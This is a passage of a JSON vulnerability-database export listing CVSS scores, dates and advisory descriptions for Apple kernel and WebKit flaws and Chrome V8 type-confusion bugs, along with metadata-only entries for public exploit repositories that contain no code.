"scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-05-15T14:22:12", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Apple Ipados", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-09-08T02:23:04", "id": "6DF32471-44E1-5C04-BCD6-B675F00AFC08", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-09T00:30:55", "description": "# AcceleratorTroll\u2122 <img src=\"acceleratortroll/Assets.xcassets/A...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-05-15T14:22:12", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Apple Ipados", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-09-08T02:23:04", "id": "FF24BCC9-8BC6-565B-AAA2-21351E9FD2D8", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-11-30T18:54:28", "description": "# CVE-2023-2033-Analysis\n\nThe full bug report has been published...", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-26T15:24:02", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-10-11T08:20:02", "id": "82BB504A-197C-55FF-8E5D-895F8C421296", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-02T20:22:55", "description": "# 
Chrome-and-Edge-Version-Dumper\nPowershell script ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-29T20:06:33", "type": "githubexploit", "title": "Exploit for Type Confusion in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2023-09-28T11:37:29", "id": "D424D6C6-13F7-5CAE-8771-9103296520B9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "prion": [{"lastseen": "2023-11-18T22:52:37", "description": "An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. 
Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T19:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-07-27T04:15:00", "id": "PRION:CVE-2023-28206", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-28206", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T22:37:48", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T19:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-11-08T22:15:00", "id": "PRION:CVE-2023-2033", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-18T22:52:37", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T19:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-07-27T04:15:00", "id": "PRION:CVE-2023-28205", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:46:26", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T23:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2023-05-03T12:16:00", "id": "PRION:CVE-2022-3723", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:53:11", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T21:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T14:18:00", "id": "PRION:CVE-2022-4262", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-18T22:39:31", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. 
This CVE exists because of a CVE-2023-28205 security regression for the WebKitGTK package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T22:15:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2203", "CVE-2023-28205"], "modified": "2023-05-25T17:25:00", "id": "PRION:CVE-2023-2203", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2023-2203", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:18:44", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T22:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-08-30T17:55:00", "id": "PRION:CVE-2022-1364", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:18:14", "description": "Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-23T00:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1096"], "modified": "2022-10-27T22:50:00", "id": "PRION:CVE-2022-1096", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-1096", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-11-08T18:34:34", "description": "An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T19:15:00", "type": "cve", "title": "CVE-2023-28206", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-07-27T04:15:00", "cpe": [], "id": "CVE-2023-28206", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-28206", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-02T17:59:19", "description": "Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-01T23:15:00", "type": "cve", "title": "CVE-2022-3723", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-3723"], "modified": "2023-05-03T12:16:00", "cpe": [], "id": "CVE-2022-3723", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-08T18:34:34", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in Safari 16.4.1, iOS 15.7.5 and iPadOS 15.7.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1. 
Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-10T19:15:00", "type": "cve", "title": "CVE-2023-28205", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-07-27T04:15:00", "cpe": [], "id": "CVE-2023-28205", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-28205", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-30T17:35:59", "description": "Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2023-04-14T19:15:09", "type": "cve", "title": "CVE-2023-2033", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-2033"], "modified": "2023-11-08T22:15:08", "cpe": [], "id": "CVE-2023-2033", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-2033", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-02T16:27:23", "description": "Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-26T22:15:00", "type": "cve", "title": 
"CVE-2022-1364", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1364"], "modified": "2022-08-30T17:55:00", "cpe": [], "id": "CVE-2022-1364", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-1364", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-02T18:20:41", "description": "Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-02T21:15:00", "type": "cve", "title": "CVE-2022-4262", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T14:18:00", "cpe": [], "id": "CVE-2022-4262", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4262", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-08T18:07:11", "description": "A flaw was found in the WebKitGTK package. An improper input validation issue may lead to a use-after-free vulnerability. This flaw allows attackers with network access to pass specially crafted web content files, causing a denial of service or arbitrary code execution. 
